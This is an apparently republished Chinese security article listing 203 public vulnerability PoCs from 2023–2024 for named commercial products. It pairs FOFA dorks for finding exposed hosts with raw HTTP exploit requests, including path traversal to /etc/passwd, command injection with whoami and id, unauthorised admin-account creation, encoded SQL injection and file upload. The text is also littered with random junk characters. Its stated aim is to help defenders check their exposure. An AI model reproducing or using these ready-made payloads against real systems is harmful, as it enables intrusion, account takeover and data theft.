互联网公开漏洞整理202309-202406 X" @, ^3 v6 g0 N
道一安全 2024-06-05 07:41 北京
) i% s+ D0 k$ I以下文章来源于网络安全新视界 ,作者网络安全新视界$ k h! |$ t8 N3 m7 n e
( `* F7 O) Z0 l- d6 I5 L) [8 y, Y发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。0 }: S8 W9 Y& J- F( Q
; z% k" J' T9 R9 A! Z0 b8 h漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。4 P! Z3 ^& W' T7 [; {/ Y
, r2 E/ L4 d& T. U+ T$ s9 g* U
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
3 [/ A H' J1 c: v
% F: h" J0 L9 b2 H6 ~& j0 y! s文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。" D% Y1 B( Z5 p" r* {0 t
& H4 v$ x/ @6 G+ X合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。9 `) r! L2 ]/ c( Z8 j
0 {8 V3 ?! a0 K: C% H1 o& F
/ a, H; v3 ]/ j/ M* [
声明
/ m& u( h& o& y3 ^* D9 k/ W3 ~) ]% l/ q( U
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。- Y% g. }4 Q7 @
7 e/ w% _: d6 T
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
) {0 B9 H/ E$ l( S0 F5 ~
9 u( z$ @# y9 l$ P- y8 x( D6 O* u0 q" x8 a
6 J3 {. s9 H1 O7 G目录/ n$ p! c! l- M
% H4 e2 S- M" @5 O; S
01: W! C2 M7 H4 L* J3 X d
# a7 p8 K) J* Z* {, _% [2 b1. StarRocks MPP数据库未授权访问
; z$ b3 {- D ?( ?2. Casdoor系统static任意文件读取
' W2 g( @# u4 k. T2 p, n3. EasyCVR智能边缘网关 userlist 信息泄漏. g3 E( r7 l% e2 n7 Y' a' m0 K8 d
4. EasyCVR视频管理平台存在任意用户添加7 I3 j' R( v! r; b8 `
5. NUUO NVR 视频存储管理设备远程命令执行
7 a' @3 a$ @7 F, u0 T! R6. 深信服 NGAF 任意文件读取
( c ^& l. _0 [ A" R& v7. 鸿运主动安全监控云平台任意文件下载) E+ }1 ~ ^+ [( M
8. 斐讯 Phicomm 路由器RCE0 j& X. ^$ W& k. N# _2 y
9. 稻壳CMS keyword 未授权SQL注入( [& C7 ]! ?7 F' Y3 \
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
6 ]5 u/ A+ ~* c, Q' A11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入) n, N% E/ g5 O- [' C7 H
12. Jorani < 1.0.2 远程命令执行: a% K0 {0 j _, L- r
13. 红帆iOffice ioFileDown任意文件读取
. O8 D2 p. x% o$ h; Z+ o14. 华夏ERP(jshERP)敏感信息泄露
, f5 E2 v# g4 e, _5 U" S" \15. 华夏ERP getAllList信息泄露
% c0 W4 `" L4 P2 J/ Q16. 红帆HFOffice医微云SQL注入
# a) m9 i# O# i X7 C# J17. 大华 DSS itcBulletin SQL 注入7 w T( C9 L+ y1 K0 ~, z
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
8 H4 c8 ^: t1 i9 ~19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入* N' h. G* }! \. t( V
20. 大华ICC智能物联综合管理平台任意文件读取
" S! j+ e3 z. b0 `: j21. 大华ICC智能物联综合管理平台random远程代码执行" u5 y7 Q1 k9 O
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
$ W# ^4 X2 l0 x+ n( Q0 f- P23. 大华ICC智能物联综合管理平台 fastjson远程代码执行6 ~0 i0 j/ J0 x5 @, U
24. 用友NC 6.5 accept.jsp任意文件上传: f* w1 w+ |! `- {
25. 用友NC registerServlet JNDI 远程代码执行1 L8 ^9 s- F- x" u" N
26. 用友NC linkVoucher SQL注入( e/ O" ]1 T, q4 f$ u9 L
27. 用友 NC showcontent SQL注入
" H5 {* M0 J$ B3 `28. 用友NC grouptemplet 任意文件上传
% m6 O' `, k- o) Z) ]: l29. 用友NC down/bill SQL注入( i% k; a) \: q$ O/ r
30. 用友NC importPml SQL注入
. }7 W& {4 f" [: ^0 i: u/ V3 S31. 用友NC runStateServlet SQL注入 M- X8 h8 K. A4 L" ]7 ?8 b1 s: d
32. 用友NC complainbilldetail SQL注入
3 Y# X4 R% P- G. W33. 用友NC downTax/download SQL注入
5 p# L. t! i- m6 G2 O34. 用友NC warningDetailInfo接口SQL注入
& p8 O7 Q8 i3 [' }( L, R35. 用友NC-Cloud importhttpscer任意文件上传
$ L; A- n/ }1 c4 N' R; M+ V3 K' j9 R7 m36. 用友NC-Cloud soapFormat XXE
# X& m0 O1 J9 q; X5 d2 J37. 用友NC-Cloud IUpdateService XXE. H6 A9 f1 ~$ |+ y$ _0 g% a
38. 用友U8 Cloud smartweb2.RPC.d XXE( a% f8 {" R: ^* z- M% ]. k, P; z
39. 用友U8 Cloud RegisterServlet SQL注入- T9 |' p% D: \( V: d
40. 用友U8-Cloud XChangeServlet XXE0 K* @ {" u1 }) M% H* T2 h$ ^: b0 D
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入( W9 w8 @0 |5 f! M4 o
42. 用友GRP-U8 SmartUpload01 文件上传6 x9 I8 Z' j( _( m. V. V
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
6 A7 o) _8 C2 W" X/ e( F3 d9 d44. 用友GRP-U8 bx_dj_check.jsp SQL注入
/ i, Y2 j" b3 ]45. 用友GRP-U8 ufgovbank XXE
( T" P1 t4 S2 d$ _0 v46. 用友GRP-U8 sqcxIndex.jsp SQL注入
; Y. U0 @& }3 q1 \47. 用友GRP A++Cloud 政府财务云 任意文件读取5 B6 S4 i* ], I5 e
48. 用友U8 CRM swfupload 任意文件上传# `+ `& t8 d. I: C6 V4 a, M. ^" m
49. 用友U8 CRM系统uploadfile.php接口任意文件上传8 W m1 b; c) Y2 n7 T0 D
50. QDocs Smart School 6.4.1 filterRecords SQL注入. ^3 e7 Z+ k/ ^8 K7 c6 H& G) O* e
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
& E, ]! [) @" K- ~5 s- Z2 l; `# Y52. 泛微E-Office json_common.php sql注入
, z5 a2 U) G" d1 V) \* P2 E$ o53. 迪普 DPTech VPN Service 任意文件上传
' |" W% r# I# P7 r# V4 H, Y54. 畅捷通T+ getstorewarehousebystore 远程代码执行
, x7 e1 e( X. v- o; V. f55. 畅捷通T+ getdecallusers信息泄露
; `$ L, ~" E5 W1 w: K' K56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
" |4 J) V4 a! ^7 x+ `57. 畅捷通T+ keyEdit.aspx SQL注入
. p$ E. n. O# }. N8 D3 m58. 畅捷通T+ KeyInfoList.aspx sql注入
$ h& b4 @: F( `$ Q4 \9 c59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行2 Y8 c& ^3 {" h3 @! z" ?
60. 百卓Smart管理平台 importexport.php SQL注入+ ~* a6 f" n0 V7 }( ]
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传$ v1 ], ?# V) C
62. IP-guard WebServer 远程命令执行
8 P" G/ X! ^3 R' C63. IP-guard WebServer任意文件读取
* Q* @% c& u' L4 H3 H64. 捷诚管理信息系统CWSFinanceCommon SQL注入) l( ]- `# P* ^7 P- X$ g5 E& C
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过9 O; z2 I k7 O) ~( X8 t' ]
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
, r/ I7 I# s2 b' S2 Y: Y, o67. 万户ezOFFICE wpsservlet任意文件上传
% Z: X, W6 E) e" o68. 万户ezOFFICE wf_printnum.jsp SQL注入
3 t+ h3 Z, o) D5 r69. 万户 ezOFFICE contract_gd.jsp SQL注入
% L. ^/ H# ?7 N3 S' K; A3 Y5 ^: B70. 万户ezEIP success 命令执行- G: u7 R% y( k6 T
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入& j* y- |8 ]0 Q" Q) c, |$ A$ ^. f
72. 致远OA getAjaxDataServlet XXE
4 X& c! R6 F- T4 N+ v, u73. GeoServer wms远程代码执行) P8 j9 ^ U7 V. f# D: d3 @6 n
74. 致远M3-server 6_1sp1 反序列化RCE5 y9 J5 P! l# a; v' [
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
( M3 q- g" x% Y& @* v76. 新开普掌上校园服务管理平台service.action远程命令执行
/ T# k6 F* M5 S3 G7 X, Z77. F22服装管理软件系统UploadHandler.ashx任意文件上传
: H2 f$ w. o1 P1 i) Q9 m78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
% [6 c- U7 Y" F! l" | k79. BYTEVALUE 百为流控路由器远程命令执行
9 \2 G4 S) Z7 N u9 e5 e- f80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
7 Q% b8 ^( m6 j1 |81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露. m# |: `; n5 w* Y$ a% j
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
7 F- W1 `2 A0 I4 T' q$ j; _9 O83. JeecgBoot testConnection 远程命令执行
) I2 L7 L8 s% n6 W0 g84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
) ?7 E$ q+ I1 l5 d, V85. SysAid On-premise< 23.3.36远程代码执行
; O& t. y, u$ [8 U- h86. 日本tosei自助洗衣机RCE3 v) B- |1 I1 B* H
87. 安恒明御安全网关aaa_local_web_preview文件上传
- `. S- S& v: L6 d9 [' v88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行) k0 H5 y* k y- k
89. 致远互联FE协作办公平台editflow_manager存在sql注入* b- b. y" M3 K9 R! L, w! b
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行% T: [' E9 G5 h# @7 g$ |
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
& i6 Q& ~1 |: z4 u92. 海康威视运行管理中心session命令执行
7 W; D$ O) S: y; j5 g93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传4 N7 g% j1 r0 e! s& }
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
# r0 p1 h' F* K3 |95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行& h* l% O6 l) p& ^& W
96. Apache OFBiz 18.12.11 groovy 远程代码执行
! T- b5 A6 d! X5 e$ g3 S97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
) n- C3 C: B& C) Y6 y; e98. SpiderFlow爬虫平台远程命令执行+ d! s& w9 G' b1 Z
99. Ncast盈可视高清智能录播系统busiFacade RCE8 X" g: X) ~& L5 k9 @/ |
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传) i* N: o' Y9 Z9 \& W; t- F
101. ivanti policy secure-22.6命令注入3 \+ X- F5 Q0 P2 j$ X2 C
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
6 m- Y/ t* j( N9 \! R2 j9 T S103. Ivanti Pulse Connect Secure VPN XXE
; _) r) v" V/ K1 O/ ~; W a6 [104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露9 [: c3 q$ v6 X& m$ ?5 l" q% n
105. SpringBlade v3.2.0 export-user SQL 注入
& f( b" }5 C4 L# [/ u106. SpringBlade dict-biz/list SQL 注入9 j# }3 ?5 g6 R& Q& F
107. SpringBlade tenant/list SQL 注入: R6 i% `) k4 D6 T$ G7 M1 }
108. D-Tale 3.9.0 SSRF
, N( b# D/ _1 G; _, R8 |7 M2 [* h109. Jenkins CLI 任意文件读取
& m5 p- N6 l, B; _5 p0 }110. Goanywhere MFT 未授权创建管理员% L8 o2 c5 i* a5 P4 }, Q
111. WordPress Plugin HTML5 Video Player SQL注入( E- _: E2 L2 p4 M3 t5 y
112. WordPress Plugin NotificationX SQL 注入! H5 J( O9 V& @! a2 O
113. WordPress Automatic 插件任意文件下载和SSRF/ P- P+ S H- A7 J, b; g6 _
114. WordPress MasterStudy LMS插件 SQL注入
( z3 |! ]9 o6 n. [115. WordPress Bricks Builder <= 1.9.6 RCE' J" f* g; L/ x& y# q
116. wordpress js-support-ticket文件上传
1 ]! Q1 ~2 j+ F4 F; y5 }$ ?117. WordPress LayerSlider插件SQL注入6 H# |- g* l- H0 W; @2 R$ ^
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传0 Z7 G9 U2 I: J) K; J$ O, J- B) {
119. 北京百绰智能S20后台sysmanageajax.php sql注入
1 m: \2 p' d7 ]0 q, u. N120. 北京百绰智能S40管理平台导入web.php任意文件上传$ U2 g+ V& v! g* Q4 g4 f% X+ r
121. 北京百绰智能S42管理平台userattestation.php任意文件上传! a. G: o- K5 O* y6 T4 d9 l5 J8 X$ O
122. 北京百绰智能s200管理平台/importexport.php sql注入% _+ Q2 n$ p1 A9 u$ I
123. Atlassian Confluence 模板注入代码执行
) W6 K0 x/ E, C' S% O124. 湖南建研工程质量检测系统任意文件上传
. E w1 v: V& j& P125. ConnectWise ScreenConnect身份验证绕过
, S8 P& y" S7 {4 T' B126. Aiohttp 路径遍历
. r# s1 a# c: t( i; ^127. 广联达Linkworks DataExchange.ashx XXE
/ c- N' t4 q2 Z128. Adobe ColdFusion 反序列化 v; }; t$ J. T# M8 y, t/ M8 ^& Y
129. Adobe ColdFusion 任意文件读取$ U' p+ D# A& e3 W) B: d
130. Laykefu客服系统任意文件上传
+ ` G$ v; M/ _2 o. m% f6 m, P131. Mini-Tmall <=20231017 SQL注入( V4 A2 t j+ Z) Y5 a; f
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
+ I7 M; H1 m9 u" t6 P A1 b* U133. H5 云商城 file.php 文件上传4 J9 V1 n% @8 \% y
134. 网康NS-ASG应用安全网关index.php sql注入
% r% d' I5 t. m/ Q135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入( l' e% S4 }$ X
136. NextChat cors SSRF4 @2 V' r$ Q: J4 P: ~6 l
137. 福建科立迅通信指挥调度平台down_file.php sql注入: l) V* J9 I" o! u9 i) R3 U% R
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入7 a) y: D9 Y5 q3 E1 F
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
( ~% O1 j2 x4 [8 v; Q! Q140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入. x- B; U- T B5 S- s9 ^' `
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入, ` S7 H2 a& a1 H3 c* \9 b
142. CMSV6车辆监控平台系统中存在弱密码
" {9 ^6 A% D0 p% D3 p6 J+ M143. Netis WF2780 v2.1.40144 远程命令执行2 t' m* u1 N# ^3 G7 I) c
144. D-Link nas_sharing.cgi 命令注入 C) B; r9 \8 b- G( ^$ A
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
' x! ^: w% }$ _" |% w146. MajorDoMo thumb.php 未授权远程代码执行
$ j& @6 t7 n' u0 x4 G4 Y" R147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
, X3 N! p) d3 \3 o148. CrushFTP 认证绕过模板注入% i: F4 e; @: x% v$ b4 N8 J9 v
149. AJ-Report开源数据大屏存在远程命令执行% S+ P. P' W6 w; u# }7 M
150. AJ-Report 1.4.0 认证绕过与远程代码执行: Y3 o" F' m! ~5 A0 p
151. AJ-Report 1.4.1 pageList sql注入# a; V9 z7 ~: r9 |! |. }/ Q
152. Progress Kemp LoadMaster 远程命令执行, t# r' ~- a6 H" P1 T4 T% @$ ?
153. gradio任意文件读取
" ~# g, a/ ]) J1 E; u154. 天维尔消防救援作战调度平台 SQL注入
; o5 ?1 N8 {" _0 R% X155. 六零导航页 file.php 任意文件上传
" }/ g1 Q7 m- R1 L7 s1 }156. TBK DVR-4104/DVR-4216 操作系统命令注入$ i/ }4 c8 ]0 c
157. 美特CRM upload.jsp 任意文件上传' w. a+ S( p. P) n0 I/ T' T6 O2 v% X: X
158. Mura-CMS-processAsyncObject存在SQL注入 `% c S1 q N; `4 ~6 r: a
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传 C* n' G+ N3 e
160. Sonatype Nexus Repository 3目录遍历与文件读取
- t# ^# o4 z6 J" L161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传( X2 f2 p4 y! t& Z
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
1 V$ h8 r7 @5 x4 Y163. 号卡极团分销管理系统 ue_serve.php 任意文件上传 F6 J, Z% r" j$ Y4 R' o* z
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
8 g \/ g u) t! H165. OrangeHRM 3.3.3 SQL 注入3 F: U) O" z0 T+ p0 i5 x" C% Z
166. 中成科信票务管理平台SeatMapHandler SQL注入2 \! A2 y/ |! \: [3 f
167. 精益价值管理系统 DownLoad.aspx任意文件读取
( |* n$ ^) X2 }* |0 h1 G168. 宏景EHR OutputCode 任意文件读取
4 k* S# N/ d, A0 _: P% N* D. q+ {+ o1 Z169. 宏景EHR downlawbase SQL注入
2 i" k. g1 q$ S* W170. 宏景EHR DisplayExcelCustomReport 任意文件读取) f ]9 A2 \( p5 q% ^. b+ W& P
171. 通天星CMSV6车载定位监控平台 SQL注入; V& B- ?: c( `" y
172. DT-高清车牌识别摄像机任意文件读取% v3 o) l" n8 ?) `* c3 _7 y- J
173. Check Point 安全网关任意文件读取
: P2 n; A6 a, U$ ^; Z174. 金和OA C6 FileDownLoad.aspx 任意文件读取
" o/ v. W! `* f9 A0 F4 A1 L f175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
% h: F6 k8 p5 _3 D) D P8 d176. 电信网关配置管理系统 rewrite.php 文件上传
4 Y$ g; j: E! w% S- _177. H3C路由器敏感信息泄露; g! G1 ?1 S# L
178. H3C校园网自助服务系统-flexfileupload-任意文件上传$ `) q2 }8 Z; p2 y' y
179. 建文工程管理系统存在任意文件读取# T1 S6 k$ x* @# C
180. 帮管客 CRM jiliyu SQL注入 U( @. d# K- |) k$ ]2 T: U
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入7 ^& t/ A5 b. e- W3 E
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建! }1 u; `+ q) b8 y$ q: P& n4 N
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
. N9 q5 z* p$ s# R7 m, F184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
) w, X5 v" g6 r4 I8 R185. 瑞友天翼应用虚拟化系统SQL注入
1 @, h) U$ ]4 k( f186. F-logic DataCube3 SQL注入
?, k# H& I2 S( m; a3 D187. Mura CMS processAsyncObject SQL注入1 v E! E1 p: d9 v" A/ a
188. 叁体-佳会视频会议 attachment 任意文件读取
* J" _; }9 L$ K, z- ?# f4 B; {( e189. 蓝网科技临床浏览系统 deleteStudy SQL注入; H8 K4 d6 d8 Z
190. 短视频矩阵营销系统 poihuoqu 任意文件读取" u' H/ R! k) q) h ]5 c. K
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入0 Z+ ]6 ?, y1 m2 y/ B
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
& ]( a1 z: n5 j) ]193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行( U8 U$ e* O3 q. x1 o
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传" r/ f' Q- d [# e* X# D/ ~, I
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行% \. K7 j- v. T4 ], P+ `) C5 |( ^
196. 河南省风速科技统一认证平台密码重置) m5 ^: g, S* h7 [6 U9 Y
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入" k+ n; J2 R8 l( a5 O
198. 阿里云盘 WebDAV 命令注入
1 K: T1 q; U3 m5 c9 Z199. cockpit系统assetsmanager_upload接口 文件上传 m( b8 J$ z7 f8 S: B9 \: p) @, m
200. SeaCMS海洋影视管理系统dmku SQL注入5 \: J+ B& n* H# G" S$ ~0 s
201. 方正全媒体新闻采编系统 binary SQL注入+ N) d6 o9 v. J( Q$ K+ u v
202. 微擎系统 AccountEdit任意文件上传/ O% C7 @" s: ?# F
203. 红海云EHR PtFjk 文件上传; q; n7 v, m+ s% O) `
7 b. q/ b9 m( h. z0 Y% u- \2 t
POC列表
9 |* S6 N# l0 r
; I2 q$ L# G) F1 u/ c02
/ Z- R! `2 { \6 j
& Q9 k) Z. S E1. StarRocks MPP数据库未授权访问4 I! f% b+ X) u# ]( C+ [/ h& A
FOFA :title="StarRocks"* p( ?6 K: o" H) t; I0 N, B4 c/ H
GET /mem_tracker HTTP/1.1% J+ s$ M: x! Z
Host: URL- N2 l) O$ r5 m: s. `* R E
% E) {2 U& C; h' B9 f
4 G+ ~4 N9 `( h% u' E5 p# R# m6 N2. Casdoor系统static任意文件读取( |9 x1 l8 ?! `# G; v$ c. v5 F
FOFA :title="Casdoor"
8 j( S( P" \4 A5 ], yGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1 q" p( p, s* p. V+ m
Host: xx.xx.xx.xx:9999' Y3 w2 V; B2 M& B
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36. i) M( @0 W: l. o9 y4 l
Connection: close
4 O. `9 T5 r3 `3 nAccept: */*
) L& n; u9 ?6 ]Accept-Language: en/ W% k1 s: m* F0 }0 \
Accept-Encoding: gzip: R% k7 D& W; m8 m( S
7 @! C: e8 Y, u3 N& I
0 P; A4 U5 f5 F2 e& k
3. EasyCVR智能边缘网关 userlist 信息泄漏
7 S4 Y- e" G j3 X" dFOFA :title="EasyCVR"* V, w6 b; J6 P8 X
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.15 {$ O& I) P( I# T5 w, G, z% E
Host: xx.xx.xx.xx
; @ f, O/ b# A! }( i6 J
; E( u4 e* I6 R! ]9 d l. o! q0 }
% {8 O6 _, m! w" W4. EasyCVR视频管理平台存在任意用户添加
% b6 s* d. |9 K) M& V) IFOFA :title="EasyCVR"2 @ D8 A C* M N
2 c. R! ~- {* Kpassword更改为自己的密码md5 L, t( K @7 {5 B/ o
POST /api/v1/adduser HTTP/1.1& J- V+ j. O3 A3 e+ @
Host: your-ip
. g0 r7 h. q0 ]0 l8 }Content-Type: application/x-www-form-urlencoded; charset=UTF-8
" E3 U z2 W+ I& f% F' `+ O2 O G3 {: b9 ^# l+ O; ~1 _5 w
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
; f6 [( v8 X% o& z y" D! y' |6 [4 ^" h$ Z; R& q
- h0 O" L, R- v M' d5. NUUO NVR 视频存储管理设备远程命令执行6 g/ A6 k7 D: t) D$ J2 E& D
FOFA:title="Network Video Recorder Login"
" j( m: \2 v9 k" tGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1+ s$ t# y1 o% [7 N9 q+ F
Host: xx.xx.xx.xx
+ Q; h9 P8 n6 \5 x
) p5 Z: y$ }: G8 g6 N; a' `1 \( Q3 k, T; {
6. 深信服 NGAF 任意文件读取 E4 g s1 E( ?1 i% i" t2 f
FOFA:title="SANGFOR | NGAF"# |8 b B7 k, o' G- ?+ [: _% i
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1, d% D+ x4 H1 I3 I3 O; P
Host:7 I \: n3 X" p
5 k4 P9 k' j$ V! I6 o4 U! O
Y5 {# u( V& {9 K6 u7. 鸿运主动安全监控云平台任意文件下载
8 Y( @7 @' W/ f; lFOFA:body="./open/webApi.html"
2 s5 w& \; ~7 M! I( @* k& kGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
" \) u% k& |, @' RHost:$ v* n6 N) y i
! L& Q) r. Z* r
/ }, Q& N8 }" j% M$ E8. 斐讯 Phicomm 路由器RCE- g8 a8 W& G$ n* v1 U
FOFA:icon_hash="-1344736688"8 N) A) \0 x/ Y! [$ C% v9 Z# U
默认账号admin登录后台后,执行操作$ ]6 o- O5 f ~8 r* U0 E* |
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
6 ^. l R# R/ R, ^% F; jHost: x.x.x.x
1 p- J* e' {& w6 A I: C+ gCookie: sysauth=第一步登录获取的cookie
- _4 C/ W2 O$ a0 ^3 B. aContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
0 D* ^6 u; h' y! xUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36/ `( k$ _6 j6 ]# U
+ o0 j+ b# w9 H------WebKitFormBoundaryxbgjoytz, a* f1 U% n6 ^ z6 L
Content-Disposition: form-data; name="wifiRebootEnablestatus"
) a0 @$ v% v& b) m) y- d/ o9 ~9 x, Z7 o8 K1 e; f4 u l
%s
% S/ q7 t, d" {1 n; X* P------WebKitFormBoundaryxbgjoytz1 E2 _$ ~4 Z/ k/ V
Content-Disposition: form-data; name="wifiRebootrange"' u0 |; A- V- U# R, r4 h7 i
4 C+ E. s! v6 M' }0 u; R
12:00; id;
+ j6 f: Z! u8 T$ f------WebKitFormBoundaryxbgjoytz& e) a+ F! G ~6 a& T0 \* y
Content-Disposition: form-data; name="wifiRebootendrange"7 k1 s4 y0 Y/ _7 Z
) r. o4 x9 I6 V) A# ]%s:
4 P& E" g( D3 r; C* ?5 O------WebKitFormBoundaryxbgjoytz
' f' X* j9 H% q- `Content-Disposition: form-data; name="cururl2"" E% k3 ]' i2 A R; A6 a( C7 t
( f! S0 C2 g' {7 Y: i, `6 `4 Y; p+ J* i# |/ R; e" i. F6 e, e
------WebKitFormBoundaryxbgjoytz--
0 O+ t( c( v1 _1 u5 `: d, O
! \ N$ |3 g3 a4 I1 M. P
1 X P( w" I6 S& o4 X9. 稻壳CMS keyword 未授权SQL注入
" \$ q0 @. ]8 k4 c1 D8 Y: ~FOFA:app="Doccms"
! I" z) Z; \3 N7 m- f4 IGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
# }: h4 [6 u( m, J( \' n) ]) JHost: x.x.x.x1 o9 \# k# v4 O( e- D/ a* ~$ \
" u5 Q: P0 O6 Z6 E
+ @5 @6 x* Q1 |/ r0 wpayload为下列语句的二次Url编码
3 S% s/ c- P: K2 z3 I6 z8 i$ L/ B8 V& `; K( W) i; t8 U! }- u
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
4 w+ x3 O4 s: R W( ?) G7 W( W2 v4 Q! i. d1 S, t3 f& T0 R; k
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传- @* D( E$ k6 k, R
FOFA:icon_hash="953405444"
5 Z6 S1 d2 B% v7 T5 _
7 o: w/ V7 H7 j文件上传后响应中包含上传文件的路径
* p9 z$ w( e- m6 J' S lPOST /eis/service/api.aspx?action=saveImg HTTP/1.16 V; ]' C* f) C6 V
Host: x.x.x.x:xx
; g* d6 c1 {; vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36% k5 W S9 Q+ T. E
Content-Length: 197
+ }$ x8 X! w+ m2 E7 {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.97 i) E: S: ?% A( G; U2 C
Accept-Encoding: gzip, deflate
: J% C; }# P6 |9 kAccept-Language: zh-CN,zh;q=0.9
0 v8 X9 u, \- X9 f! |Connection: close' q; C6 m, P2 D* d
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu# k7 n3 k# q) _- t( F; W8 K
& X( u4 L# X) g* @- [: v------WebKitFormBoundaryxdgaqmqu9 p, l3 l" m) }3 G
Content-Disposition: form-data; name="file"filename="icfitnya.txt"% N. ~* P6 S' E9 s' l) c; ]- R
Content-Type: text/html
1 S0 }8 E: s3 w+ p) \
+ f5 r. ~: G% ^. a( @( G- r9 N' ?jmnqjfdsupxgfidopeixbgsxbf9 w- T" o5 ^! _! a
------WebKitFormBoundaryxdgaqmqu--
" V5 P$ N) i6 Y$ h8 U4 H/ E* C) ]
. r7 o" M6 v, u- w( u, ^- ^$ o7 k1 b1 [1 B/ e6 M3 q) r
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入: t" T4 J/ `! I6 m2 I
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"0 c3 ]$ F b; P" @/ i% ~7 H
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
